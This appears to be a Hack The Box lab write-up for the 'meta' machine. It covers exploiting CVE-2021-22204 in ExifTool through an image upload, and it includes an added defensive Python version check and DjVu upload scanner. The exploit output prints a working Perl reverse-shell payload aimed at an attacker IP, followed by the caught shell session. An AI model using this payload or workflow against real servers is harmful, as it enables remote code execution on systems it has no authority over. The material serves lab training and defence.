CVE-2021-22204


The target web application is suspected to be using exiftool in the backend to process the uploaded images in order to display the metadata back to users. Although various techniques were tried in an attempt to exploit the upload feature, nothing seemed to work, leaving this as the only remaining option. At this point it is not confirmed whether the exiftool present in the backend is vulnerable, but I can still give it a shot.

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ python3 CVE-2021-22204.py -s 10.10.14.3 443                          
 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
unicord: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
payload: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(443,inet_aton('10.10.14.3')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")
depends: Dependencies for exploit are met!
prepare: Payload written to file!
prepare: Payload file compressed!
prepare: DjVu file created!
prepare: JPEG image created/processed!
prepare: Exiftool config written to file!
exploit: Payload injected into image!
cleanup: Old file artifacts deleted!
success: Exploit image written to "image.jpg"

While the [[meta_cve-2021-22204#exploit|exploit]] gives a few options to embed arbitrary commands into an existing image file, it also supports generating a new image and embedding the commands into that.

Then I just need to upload it. The backend will process this image with exiftool; if it is the vulnerable version, the embedded reverse shell will be executed.
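From the defender's side, the condition the writeup relies on is an unpatched exiftool that parses DjVu annotation data embedded in whatever file the upload handler passes to it. The following is an added example (editor's code, not part of the original writeup or of the unicord tool) showing the two checks a backend owner would want: a version gate based on the published affected range (CVE-2021-22204 affects ExifTool 7.44 through 12.23 and was fixed in 12.24), and an upload pre-filter that refuses to hand a file to exiftool if it carries a DjVu container (`AT&TFORM` IFF signature) or a DjVu annotation chunk (`ANTa`/`ANTz`), whether at the start of the file or embedded inside a JPEG's metadata. The sample byte strings are constructed for the demonstration and are not real files or payloads.

```python
import re
import subprocess
from typing import List, Optional, Tuple

# CVE-2021-22204 was fixed in ExifTool 12.24; affected releases are 7.44 through 12.23.
FIRST_AFFECTED = (7, 44)
FIXED_VERSION = (12, 24)

# DjVu containers start with this IFF signature. exiftool hands the data to its
# DjVu parser when it sees it, including when the container sits inside another
# file's metadata rather than at offset 0.
DJVU_MAGIC = b"AT&TFORM"
# Annotation chunk IDs: ANTa (plain text) and ANTz (BZZ-compressed). The
# vulnerable code path is the parser for the "(metadata ...)" records they carry.
ANNOTATION_CHUNKS = (b"ANTa", b"ANTz")


def parse_version(text: str) -> Optional[Tuple[int, int]]:
    """Turn the output of `exiftool -ver` (for example "12.23") into (major, minor)."""
    m = re.search(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_vulnerable_version(text: str) -> bool:
    """True when the version string falls inside the affected range."""
    v = parse_version(text)
    return v is not None and FIRST_AFFECTED <= v < FIXED_VERSION


def installed_exiftool_is_vulnerable() -> Optional[bool]:
    """Query the locally installed exiftool; returns None if it is not installed."""
    try:
        out = subprocess.run(["exiftool", "-ver"], capture_output=True,
                             text=True, timeout=10).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return is_vulnerable_version(out)


def djvu_findings(data: bytes) -> List[str]:
    """Return reasons an upload should be quarantined before exiftool sees it."""
    findings: List[str] = []
    pos = data.find(DJVU_MAGIC)
    if pos == -1:
        return findings
    findings.append(f"DjVu container at offset {pos}")
    # Annotation chunks only matter once a DjVu container has been seen, so
    # search from the signature onward rather than over the whole file.
    for chunk in ANNOTATION_CHUNKS:
        cpos = data.find(chunk, pos)
        if cpos != -1:
            findings.append(f"{chunk.decode()} annotation chunk at offset {cpos}")
    return findings


def safe_to_pass_to_exiftool(data: bytes, declared_jpeg: bool = True) -> bool:
    """Policy: only files with a JPEG SOI header and no DjVu structures reach exiftool."""
    if declared_jpeg and not data.startswith(b"\xff\xd8\xff"):
        return False
    return not djvu_findings(data)


# Constructed samples (not real files): a bare JPEG skeleton, and the same
# skeleton with a DjVu container carrying an ANTz chunk embedded in an APP1 segment.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
SUSPICIOUS_JPEG = (
    b"\xff\xd8\xff\xe1" + b"\x00\x40Exif\x00\x00"
    + b"AT&TFORM" + b"\x00\x00\x00\x20" + b"DJVU"
    + b"INFO" + b"\x00\x00\x00\x0a" + b"\x00" * 10
    + b"ANTz" + b"\x00\x00\x00\x04" + b"\x00" * 4
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print("12.23 vulnerable:", is_vulnerable_version("12.23"))
    print("clean sample accepted:", safe_to_pass_to_exiftool(CLEAN_JPEG))
    print("suspicious sample findings:", djvu_findings(SUSPICIOUS_JPEG))
    print("local exiftool vulnerable:", installed_exiftool_is_vulnerable())
```

The signature scan is deliberately crude: it does not walk the IFF chunk tree, so it will also flag a legitimate DjVu document that a user uploads on purpose. For an image-only upload endpoint that is the right trade-off, since a DjVu container has no business inside a JPEG; the version gate remains the actual fix, and the scan is a compensating control while patching is in progress.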

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ nnc 443 
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.140] 42466
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
meta
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.140  netmask 255.255.254.0  broadcast 10.10.11.255
        ether 00:50:56:b9:20:93  txqueuelen 1000  (Ethernet)
        RX packets 3375839  bytes 663079419 (632.3 MiB)
        RX errors 0  dropped 19  overruns 0  frame 0
        TX packets 3370608  bytes 1258338185 (1.1 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 11141  bytes 856516 (836.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11141  bytes 856516 (836.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Session established. The backend exiftool that the target web application uses is confirmed to be vulnerable, and an initial foothold on the target system has been established by exploiting [[meta_cve-2021-22204#cve-2021-22204|CVE-2021-22204]] in the target web app.